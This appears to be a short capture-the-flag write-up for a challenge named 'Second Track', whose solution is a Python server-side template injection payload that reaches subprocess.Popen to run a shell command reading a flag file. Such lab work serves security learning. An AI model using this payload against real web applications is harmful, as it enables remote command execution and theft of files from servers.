9 lines
295 B
Markdown
Executable File
9 lines
295 B
Markdown
Executable File
## Second Track
|
|
|
|
Second Track just announced that they have the most secure backup server running in their data center. Is it as safe as the owners claim?
|
|
|
|
### Solution
|
|
|
|
```python3
|
|
{{"".__class__.__mro__[1].__subclasses__()[399]("cat /app/flag.txt", shell=True, stdout=-1).communicate()[0]}}
|
|
``` |